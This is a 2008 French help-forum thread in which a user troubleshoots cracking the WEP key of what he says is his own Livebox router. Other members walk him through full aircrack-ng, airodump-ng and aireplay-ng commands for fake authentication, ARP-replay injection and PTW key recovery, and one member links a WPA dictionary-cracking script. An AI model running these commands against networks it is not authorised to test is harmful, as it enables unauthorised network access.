ça crack pas (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 06-02-2008 01:02:23

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

ça crack pas

voilà j'ai un pc acer 5610Z
carte wifi atheros 5007eg

je suis avec un live cd bt3 beta

j'ai suivi le tuto

J'essaie de cracker ma livebox.
Super connexion
Reconnaissance de la carte par bt3

J'ai plein d'arp, de paquets..... tout fonctionne a merveille mais ......................;

j'ai plus de 11 millions d'ivs maintenant et je n'arrive tjs pas a craker la cle avec la commande  :
aircrack-ng -z -n 128 *.cap

que ce passe t il ?

merci

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-02-2008 01:20:38

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

Re : ça crack pas

petite precision j'utilise cette version : Aircrack-ng 1.0 beta1 r857

Hors Ligne

#3 06-02-2008 01:26:46

killbill
Membre
Inscription : 28-06-2007
Messages : 323

Re : ça crack pas

aircrack-ng -z <ton fichier>*.cap      suffit


carte D-LINK Atheros PCI
alpha H et portable en dualboot.XPpro backtrack3final

Hors Ligne

#4 06-02-2008 01:30:04

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : ça crack pas

Tu peux meme taper: aircrack-ng -z *.cap (soit tu met * pour ouvrir tous les fichiers .cap soit tu marque le nom du fichier .cap)

Et puis si tu nous mettait des captures d'ecran de airodump et de ce que tu fais on te repondrai beaucoup plus rapidement. (Si tu veux là c'est comme si tu appelai ton médecin en disant j'ai mal, je comprend pas mais j'ai mal)

Hors Ligne

#5 06-02-2008 17:51:11

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

Re : ça crack pas

Bon, je fais du copier coller puisque personne ne m'indique comment afficher une image dans le forum !!!!!
Je sui à chaque fois dans le repertoire de capture du fichier cap.


AIRODUMP

airodump-ng --write wep --channel 10 ath1 :

CH 10 ][ Elapsed: 11 hours 58 mins ][ 2008-02-06 10:17 ][ Decloak: 00:1A:6B:CB:61:17

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:1A:6B:CB:61:xx   63  93   404992 15372464   46  10  54  WEP  WEP    OPN  Livebox-88c7

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

00:1A:6B:CB:61:xx  00:19:7E:0D:DF:yy   65  54- 1     0 25014174  Livebox-88c7
00:1A:6B:CB:61:xx  00:14:A5:81:2E:zz  31  48- 1     1    24029  Livebox-88c7  ( c'est mon voisin à qui je passe la wifi)

AIREPLAY
1) aireplay-ng -1 0 -e Livebox-88c7 -a 00:1A:6B:CB:61:xx -h 00:19:7E:0D:DF:yy ath1
Association successful :-)
2)aireplay-ng -3 -e Livebox-88c7 -a 00:1A:6B:CB:61:xx -h 00:19:7E:0D:DF:yy ath1

Read 39773174 packets (got 20788874 ARP requests and 11658791 ACKs), sent 15846165 packets.

AIRCRACK :

aircrack-ng -z *.cap 

Aircrack-ng 1.0 beta1 r857


                   [00:44:39] Tested 513 keys (got 15371194 IVs)

   KB    depth   byte(vote)
    0    0/ 50   76(15448064) 83(15433984) 80(15431680) 70(15429376) 84(15429376)
    1    0/  1   FB(30677504) 73(15447552) 80(15435264) 7D(15430912) 81(15428608)
    2    0/  2   F7(45777664) FB(15484672) 6F(15448064) 7C(15435520) 79(15430656)
    3    0/  1   F2(60762624) F7(15486464) F6(15484160) 6A(15448576) 77(15436288)
    4    0/  1   EC(75635712) F2(15557632) F1(15486464) F0(15482880) 64(15447296

Dernière modification par cyrille (06-02-2008 17:54:46)

Hors Ligne

#6 06-02-2008 18:05:53

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : ça crack pas

Salut,
tu devrais utiliser la derniere version d'aircrack
http://tinyshell.be/aircrackng/forum/in … 0#msg17230

Je vois que tu spécifie encore l'option -z pour PTW alors qu'elle est utilisée par défaut depuis un bout de temps donc met a jour ton aircrack.

Je vois également

[00:44:39] Tested 513 keys (got 15371194 IVs)

513 clés en 44 minutes !! C'est tres lent. Tu as quoi comme PC ?

Enfin, pour ton problème de screenshot, il faut que tu upload ton image quelque part sur le net et que tu fournisses le lien de l'image entre les balises img. Si tu "cites" mon message tu verras comment j'ai fait pour ajouter ce logo de cette petite compagnie wink

logo_plain.png

cheers,
Tex

Dernière modification par Tex-Twil (06-02-2008 18:07:33)

Hors Ligne

#7 06-02-2008 18:22:36

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

Re : ça crack pas

merci tex, je croyais qu'on pouvais directement cller l'image.

j'ai mis aircrack-ng -z suite aux recommandations du tuto

Donc je vais telcharger la derniere version,
J'ai un pc portable dual cor 1,7ghz

je vais telecharger aircrack et vous tiens au jus.
merci

PS :
[00:05:52] Tested 130561 keys (got 15376538 IVs), et là, aircrack attends d'autres ivs.
je pense qu'il doit y avoir un pb avec aircrack

Dernière modification par cyrille (06-02-2008 18:34:02)

Hors Ligne

#8 06-02-2008 19:21:47

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : ça crack pas

Au fait pourquoi utilise-tu la version beta de BT3 ? il existe une version final.

Bon à part ça tout ce que je peux te dire c'est que ça doit venir de ton fichier de capture qui est "moisi".
Recommence à 0.

Surtout je vois un une erreur: quand tu fais aireplay-ng -3 il faut faire -e .... -b ..... -h ..... ath1 et non -a -h.  (Ton petit 2)

Hors Ligne

#9 06-02-2008 23:27:08

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

Re : ça crack pas

ok merci, je recommence à zero et je vous informe

et voilà le lien de l'ecran
http://apu.mabul.org/up/apu/2008/02/07/ … u.png.html

Dernière modification par cyrille (07-02-2008 03:36:06)

Hors Ligne

#10 07-02-2008 16:09:16

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

Re : ça crack pas

j'ai tout recommencé, mais ça ne change rien

voilà le lien de ma capture d'écran
http://www.monsterup.com/upload/1202391679.jpg

Hors Ligne

#11 07-02-2008 16:54:57

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : ça crack pas

Salut,
étrange. On dirait que tu utilises toujours la version beta de BT3. Tu devrais essayer avec la version finale ou alors avec cette version d'aircrack:
http://tinyshell.be/aircrackng/forum/in … 0#msg17230

Si tu veux, tu peux essayer nous uploader tes fichier de capture quelque part pour que j'essaye aussi
Pour compresser:

tar -cvf - *cap | gzip > captures.tar.gz

puis
http://www.megaupload.com/

Tex wink



Tex

Hors Ligne

#12 07-02-2008 17:06:31

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : ça crack pas

Et tu as essayé au moins aircrack-ng classique en enlevant le -z ?

Hors Ligne

#13 07-02-2008 17:40:08

dédé
Membre
Inscription : 25-11-2007
Messages : 987
Site Web

Re : ça crack pas

Tex-Twil a écrit :

Salut,
étrange. On dirait que tu utilises toujours la version beta de BT3. Tu devrais essayer avec la version finale ou alors avec cette version d'aircrack:
http://tinyshell.be/aircrackng/forum/in … 0#msg17230

il n'y a pas encore de version final backtrack 3 bt2 oui mais il vaut mieux utiliser la bt3 beta comprenant une des dernière version dev d'aircrack.

pour aircrack:

aircrack-ng -P2 montest.cap

Hors Ligne

#14 07-02-2008 17:44:52

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : ça crack pas

dédé a écrit :

il n'y a pas encore de version final backtrack 3

Oups autant pour moi. A vrai dire je n'utilise jamais BT donc je me suis trompé smile

Tex.

Dernière modification par Tex-Twil (07-02-2008 17:45:43)

Hors Ligne

#15 07-02-2008 18:04:53

dédé
Membre
Inscription : 25-11-2007
Messages : 987
Site Web

Re : ça crack pas

dommage tex-twill :

http://neovortex.kodings.googlepages.com/ez-wpacrack

ca t'aurais peut être interessé

COWPATTY
you can choose between single or splitted session
splitted one will split your dict file and spawn 8 instance of cowpatty at a time

...
smile

Dernière modification par dédé (07-02-2008 18:05:29)

Hors Ligne

#16 07-02-2008 19:14:31

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

Re : ça crack pas

j'ai telecharge la version beta2

utilise tar, make et make install....

Je vais relancer aircrack avec P2

Hors Ligne

#17 07-02-2008 19:29:55

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

Re : ça crack pas

pour wxcv

j'ai essayé tout ce que vous m'avez conseillé :
aircrack-ng *.cap avec ma version de bt3

puis download la version aircrack beta2
aircrack-ng -z *.cap
aircrack-ng *.cap
et maintenant  aircrack-ng -P2 *.cap

je vais faire un gros fichier tar et donner un lien !
merci

Hors Ligne

#18 07-02-2008 21:49:50

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : ça crack pas

Et sinon essaye d'utiliser Wifiway 0.8, perso c'est celle dont je me sers et ça marche nickel pour aircrack-ptw (-z),  chopchop ou la defragmentation.
Apres le reste perso je m'en sers pas à part pour la curiosité. De plus BT3 bug sur mon Portable Asus donc je m'en sers meme pas.

Hors Ligne

#19 07-02-2008 23:29:47

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

Re : ça crack pas

ok, merci, je vais essayer wifiway, mon fichier se telecharge tjs, j'ai une petite connection dans le trou du c.. du monde, c'est lent !!!!!!!!!!!!!!!!

Hors Ligne

#20 08-02-2008 00:05:35

dédé
Membre
Inscription : 25-11-2007
Messages : 987
Site Web

Re : ça crack pas

cyrille a écrit :

ok, merci, je vais essayer wifiway, mon fichier se telecharge tjs, j'ai une petite connection dans le trou du c.. du monde, c'est lent !!!!!!!!!!!!!!!!

c'est pourquoi dans les files de tuto-fr tu as un lien pour le télécharger, a vitesse confortable

Hors Ligne

#21 08-02-2008 02:34:11

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

Re : ça crack pas

voilà le lien de mes fichiers cap, il y environ 4 800 000 ivs, si certains veulent essayer

http://dl.free.fr/kbyCKWfjF/captures1.tar.gz

merci

Hors Ligne

#22 08-02-2008 05:36:44

charly5942
Membre d'honneur
Lieu : Lille
Inscription : 30-04-2007
Messages : 1 027

Re : ça crack pas

cyrille a écrit :

voilà le lien de mes fichiers cap, il y environ 4 800 000 ivs, si certains veulent essayer

http://dl.free.fr/kbyCKWfjF/captures1.tar.gz

merci

Je viens d'essayer. Rien

Avec 4 Millions ca devrait être instantané donc ca veut dire que tes IVs sont de mauvaise qualité. Il faut que tu recommence ta capture en t'assurant qu'avec aireplay -3 tu n'aies pas de message "Got a desauthentification packet..............." Si c'est le cas, arrête l'injection et recommence un aireplay -1 avec la bonne adresse MAC.


Matos: TP-Link TL-WN660G (chipset AR5005GS); Linksys WUSB54G V4; Atheros AR5005G
Dual boot XP / BT3 BETA
Tout message privé (MP) non sollicité sera immédiatement poubellisé sans être lu et par conséquent n'apportera aucune réponse !!! :-)

Hors Ligne

#23 08-02-2008 05:54:15

cyrille
Membre
Inscription : 09-12-2007
Messages : 61

Re : ça crack pas

salut, je n'ai pas ce message avec airplay, mais je vais relancer l'attaque, demain la suite et je vous indique tout ce que je fais

image_990_snapshot1.png[/url]


ensuite
image_760_snapshot2.png[/url]

j'obtiens
image_961_snapshot3.png[/url]

j'arrete airodump et je lance aireplay
image_252_snapshot4.png[/url]

puis :

image_456_snapshot5.png[/url]

je relance airodump avec la commande precedente

je decomprese aircrack beta2 avec tar et je fais make et make install

je lance
aircrack-ng *.cap et j'attends, le temps de fumer une cartouche de clop !

et voilà

Dernière modification par cyrille (08-02-2008 06:41:12)

Hors Ligne

#24 08-02-2008 10:49:33

Tex-Twil
Membre
Inscription : 29-08-2007
Messages : 387

Re : ça crack pas

Salut,
tes commandes semblent correctes. Es-tu sur que la cle wep ne change pas pendant la capture ?

Tex

Hors Ligne

#25 08-02-2008 11:57:59

dédé
Membre
Inscription : 25-11-2007
Messages : 987
Site Web

Re : ça crack pas

pourquoi tu arretes airodump?
tu lances aireplay, dans un nouveau shell pour l'authentification, tu ouvres encore un autre shell avec aireplay pour l'injection, puis celui de aircrack.
il ne faut pas que tu fermes le premier shell aireplay (-1) pour faire l'injection.

enfin bref je vois pas trop ou tu te plantes, comme dit tex tes commandes semblent correct. neutral

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
1 765 20-03-2016 21:26:05 par M1ck3y
crack de clef wpa par Grand Hibou
10 5956 04-07-2013 14:09:15 par cyrille
0 4479 03-12-2011 00:03:37 par M1ck3y
0 2961 15-10-2011 18:08:17 par zizou2011
2 4111 18-04-2011 12:29:56 par fifou